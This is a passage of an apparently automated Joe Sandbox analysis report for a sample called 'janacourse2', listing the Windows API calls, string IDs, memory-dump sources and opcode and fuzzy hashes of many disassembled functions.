                                                                                                            • Instruction Fuzzy Hash: 5DE06575641280ABFB315B78AA49BD83F60AB06336F048259F7F5540E4C7B642409B10
                                                                                                            APIs
                                                                                                            • GetCurrentThread.KERNEL32 ref: 01011634
                                                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,010111D9), ref: 0101163B
                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,010111D9), ref: 01011648
                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,010111D9), ref: 0101164F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentOpenProcessThreadToken
                                                                                                            • String ID:
                                                                                                            • API String ID: 3974789173-0
                                                                                                            • Opcode ID: bf55e993bb49c27173cda6243d5fc7e87d8f73b2dd94bd734240346322a278c7
                                                                                                            • Instruction ID: 9c521d2cded0ec42934e5f3b918ac1c44d1bf6096d42b0f8732f9de3863406fd
                                                                                                            • Opcode Fuzzy Hash: bf55e993bb49c27173cda6243d5fc7e87d8f73b2dd94bd734240346322a278c7
                                                                                                            • Instruction Fuzzy Hash: 0EE04FB5602211ABE7701BB49F4DB463BA9AF45792F144848F6C5C9088D67E40408B50
                                                                                                            APIs
                                                                                                            • GetDesktopWindow.USER32 ref: 0100D858
                                                                                                            • GetDC.USER32(00000000), ref: 0100D862
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0100D882
                                                                                                            • ReleaseDC.USER32(?), ref: 0100D8A3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2889604237-0
                                                                                                            • Opcode ID: 997f7d28c0dc56e3be2b7b4d296249d5349494549b9e2f3677804c1eeda72456
                                                                                                            • Instruction ID: 7dfe05cf41499458f910e43eb90b1027f938273680acac27d93ee9a698fef8ec
                                                                                                            • Opcode Fuzzy Hash: 997f7d28c0dc56e3be2b7b4d296249d5349494549b9e2f3677804c1eeda72456
                                                                                                            • Instruction Fuzzy Hash: 28E01AB9801205EFEB619FE0D748A6DBBB5FB08310F108059F886E7244C73D9901AF50
                                                                                                            APIs
                                                                                                            • GetDesktopWindow.USER32 ref: 0100D86C
                                                                                                            • GetDC.USER32(00000000), ref: 0100D876
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0100D882
                                                                                                            • ReleaseDC.USER32(?), ref: 0100D8A3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2889604237-0
                                                                                                            • Opcode ID: 2ea62e0a516a67e57bc340ace9ee01c0de0d3ca8033557ff59e07c581227fc5f
                                                                                                            • Instruction ID: 1e5bae6236f86ffd2f36232a835b105f6f7d93434fe2f09f3c768157cb1faa1d
                                                                                                            • Opcode Fuzzy Hash: 2ea62e0a516a67e57bc340ace9ee01c0de0d3ca8033557ff59e07c581227fc5f
                                                                                                            • Instruction Fuzzy Hash: D7E01AB9801200EFDB609FA0D64866DBBB5BB08310B108048F886E7244C73D6901AF50
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FB7620: _wcslen.LIBCMT ref: 00FB7625
                                                                                                            • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 01024ED4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Connection_wcslen
                                                                                                            • String ID: *$LPT
                                                                                                            • API String ID: 1725874428-3443410124
                                                                                                            • Opcode ID: 569067f7d4b46176d8dde7f8ac19568e85db201c5b2da51b68745cc89dd9aa5e
                                                                                                            • Instruction ID: 7cdf273daea9bcae447d19b69b19399fbb198939ad3bf8dd84f63fcd0faa149c
                                                                                                            • Opcode Fuzzy Hash: 569067f7d4b46176d8dde7f8ac19568e85db201c5b2da51b68745cc89dd9aa5e
                                                                                                            • Instruction Fuzzy Hash: 25918F75A00214DFDB54DF58C884EAABBF1AF84304F1980D9E84A9F7A2C735ED85CB90
                                                                                                            APIs
                                                                                                            • __startOneArgErrorHandling.LIBCMT ref: 00FDE30D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorHandling__start
                                                                                                            • String ID: pow
                                                                                                            • API String ID: 3213639722-2276729525
                                                                                                            • Opcode ID: f134f98ed10e371fd9fc16c70389214544497a6201d4b547d27bc357ed6c68ed
                                                                                                            • Instruction ID: cafb5e04ff3270b391f75c1728e7a02bced3ec772ca8f66805223828c61c0b49
                                                                                                            • Opcode Fuzzy Hash: f134f98ed10e371fd9fc16c70389214544497a6201d4b547d27bc357ed6c68ed
                                                                                                            • Instruction Fuzzy Hash: 25518E72E0C34296CB257615CD0137A3F99EF40761F3849AAE0D54A3DCEB398C85BB86
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: #
                                                                                                            • API String ID: 0-1885708031
                                                                                                            • Opcode ID: dcf6f54525e3142539cbe5a69f86cac69102e0d4a10b0bd73fe96b6ffcb71075
                                                                                                            • Instruction ID: 3edd4ee39237810f05895337463b6c5679352c9ce5e6c0ac2968024e1ab5f9e0
                                                                                                            • Opcode Fuzzy Hash: dcf6f54525e3142539cbe5a69f86cac69102e0d4a10b0bd73fe96b6ffcb71075
                                                                                                            • Instruction Fuzzy Hash: 96515575904206DFEB26DF28C482BFA7BE8FF55310F244499E8D5AB2C1D6389D42DB90
                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(00000000), ref: 00FCF2A2
                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00FCF2BB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: GlobalMemorySleepStatus
                                                                                                            • String ID: @
                                                                                                            • API String ID: 2783356886-2766056989
                                                                                                            • Opcode ID: 0372b86c89331aaabf5276ff6c28a27151a4127d0eb076354c8af833471d6474
                                                                                                            • Instruction ID: 7fd7e6c8f42972ba3d3ce65beed095ed43f6a675697c8cc5e9b24282fa0d1e28
                                                                                                            • Opcode Fuzzy Hash: 0372b86c89331aaabf5276ff6c28a27151a4127d0eb076354c8af833471d6474
                                                                                                            • Instruction Fuzzy Hash: 865135715087449BE320AF11DC86BABBBF8FBC4340F81885DF1D982195EB758529CB66
                                                                                                            APIs
                                                                                                            • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 010357E0
                                                                                                            • _wcslen.LIBCMT ref: 010357EC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: BuffCharUpper_wcslen
                                                                                                            • String ID: CALLARGARRAY
                                                                                                            • API String ID: 157775604-1150593374
                                                                                                            • Opcode ID: 06a09f628ecc7bcffa58353d45a78c2545f942f8c768224209e61a485111a2b9
                                                                                                            • Instruction ID: b098f5e39e94e942aa95494edb138d6ab7ea39e8eb7e00ca791adb89b0204792
                                                                                                            • Opcode Fuzzy Hash: 06a09f628ecc7bcffa58353d45a78c2545f942f8c768224209e61a485111a2b9
                                                                                                            • Instruction Fuzzy Hash: E9419171E002099FCB14DFA9CD819FEBBF9FF89314F244069E545A7262E7749981CB90
                                                                                                            APIs
                                                                                                            • _wcslen.LIBCMT ref: 0102D130
                                                                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0102D13A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CrackInternet_wcslen
                                                                                                            • String ID: |
                                                                                                            • API String ID: 596671847-2343686810
                                                                                                            • Opcode ID: 6ca9991b379de53b0e4eb36074bb446f9d4fe45891d207b55ec7935da8b87b5e
                                                                                                            • Instruction ID: e0019c57699598a293638c6328acad2b0947c171819f21f09deff9b517ad30a3
                                                                                                            • Opcode Fuzzy Hash: 6ca9991b379de53b0e4eb36074bb446f9d4fe45891d207b55ec7935da8b87b5e
                                                                                                            • Instruction Fuzzy Hash: 66313D71D00219ABDF15EFA5CC85AEEBFB9FF04300F100059F915A61A6E739AA06DF54
                                                                                                            APIs
                                                                                                            • DestroyWindow.USER32(?,?,?,?), ref: 01043621
                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0104365C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$DestroyMove
                                                                                                            • String ID: static
                                                                                                            • API String ID: 2139405536-2160076837
                                                                                                            • Opcode ID: 2d4d3fff05d2e78f8bc7c1014c67e9a6a3da0356cdc766408bec8c068653b9b0
                                                                                                            • Instruction ID: 6d475a59f8982aeb69edf6de220c8377928f181a23b73858de626a24d30437d9
                                                                                                            • Opcode Fuzzy Hash: 2d4d3fff05d2e78f8bc7c1014c67e9a6a3da0356cdc766408bec8c068653b9b0
                                                                                                            • Instruction Fuzzy Hash: F3318FB1110205AFEB209F68DC80EFB73A9FF48720F009629F9A597280DA35A891D760
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0104461F
                                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 01044634
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID: '
                                                                                                            • API String ID: 3850602802-1997036262
                                                                                                            • Opcode ID: aa00198675b307d6607b5b58c8b7e127cfea58215a2ace199a0083b30b5425f4
                                                                                                            • Instruction ID: ea18768fcd512b161ed392ba341ccdfab5b7a5356655e2ad9be889fffbf42fe7
                                                                                                            • Opcode Fuzzy Hash: aa00198675b307d6607b5b58c8b7e127cfea58215a2ace199a0083b30b5425f4
                                                                                                            • Instruction Fuzzy Hash: 5631E7B4A012099FDF14CFA9C981BDA7BB5FF49300F144169EA45EB342D771A945CF90
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0104327C
                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01043287
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID: Combobox
                                                                                                            • API String ID: 3850602802-2096851135
                                                                                                            • Opcode ID: 200c155b4bc206c8d38844ec479a6be0a11d5026ba0e1ea332e469b72939ee31
                                                                                                            • Instruction ID: ad0b7931393ce360d692ba87ac5c5fa3b319c636ac1561cc2c1096f7d88a5b41
                                                                                                            • Opcode Fuzzy Hash: 200c155b4bc206c8d38844ec479a6be0a11d5026ba0e1ea332e469b72939ee31
                                                                                                            • Instruction Fuzzy Hash: D911D3B13002186FFF669E58DDC0EAB37AAFB483A4F105125F9949B291D6359C51C760
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FB600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00FB604C
                                                                                                              • Part of subcall function 00FB600E: GetStockObject.GDI32(00000011), ref: 00FB6060
                                                                                                              • Part of subcall function 00FB600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FB606A
                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 0104377A
                                                                                                            • GetSysColor.USER32(00000012), ref: 01043794
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                            • String ID: static
                                                                                                            • API String ID: 1983116058-2160076837
                                                                                                            • Opcode ID: 0f35c9e166a2fd3b898c64d08fef5ca6c910e4cf47d07af324689812f09a83ca
                                                                                                            • Instruction ID: 2925a9bbf282b9d938d0c4323a2529a4843772315d7e915a58d283bcc597f745
                                                                                                            • Opcode Fuzzy Hash: 0f35c9e166a2fd3b898c64d08fef5ca6c910e4cf47d07af324689812f09a83ca
                                                                                                            • Instruction Fuzzy Hash: 961129B2610209AFEB11DFA8CD85AEE7BF8FF08354F005925F995E6240D735E8519B50
                                                                                                            APIs
                                                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0102CD7D
                                                                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0102CDA6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Internet$OpenOption
                                                                                                            • String ID: <local>
                                                                                                            • API String ID: 942729171-4266983199
                                                                                                            • Opcode ID: 7ee318c9f011224a462de4186f81abbbdf056beb31e95336aaf7025794bcaf80
                                                                                                            • Instruction ID: ae9ddfe172740d6609660b3a3d91d62fac803114ff32405fe47b1ea2cf7d0f66
                                                                                                            • Opcode Fuzzy Hash: 7ee318c9f011224a462de4186f81abbbdf056beb31e95336aaf7025794bcaf80
                                                                                                            • Instruction Fuzzy Hash: A71129B12016317AF7746A668D84FFBBEACEF026A4F00425AF18983080D3759444C6F0
                                                                                                            APIs
                                                                                                            • GetWindowTextLengthW.USER32(00000000), ref: 010434AB
                                                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 010434BA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LengthMessageSendTextWindow
                                                                                                            • String ID: edit
                                                                                                            • API String ID: 2978978980-2167791130
                                                                                                            • Opcode ID: d64d1d6a7497d942d27a4fb730a824af6a50085e3db602d54615b2814f4892bf
                                                                                                            • Instruction ID: bfca55e158604147f04a1fc4312ef4a5eaa97aec9262e7aad242f36c8fd2c919
                                                                                                            • Opcode Fuzzy Hash: d64d1d6a7497d942d27a4fb730a824af6a50085e3db602d54615b2814f4892bf
                                                                                                            • Instruction Fuzzy Hash: 33119DB5100118ABEB624E68DC84AEA37AAFB85374F505324F9A09B1D4CB36EC519B50
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
                                                                                                            • CharUpperBuffW.USER32(?,?,?), ref: 01016CB6
                                                                                                            • _wcslen.LIBCMT ref: 01016CC2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$BuffCharUpper
                                                                                                            • String ID: STOP
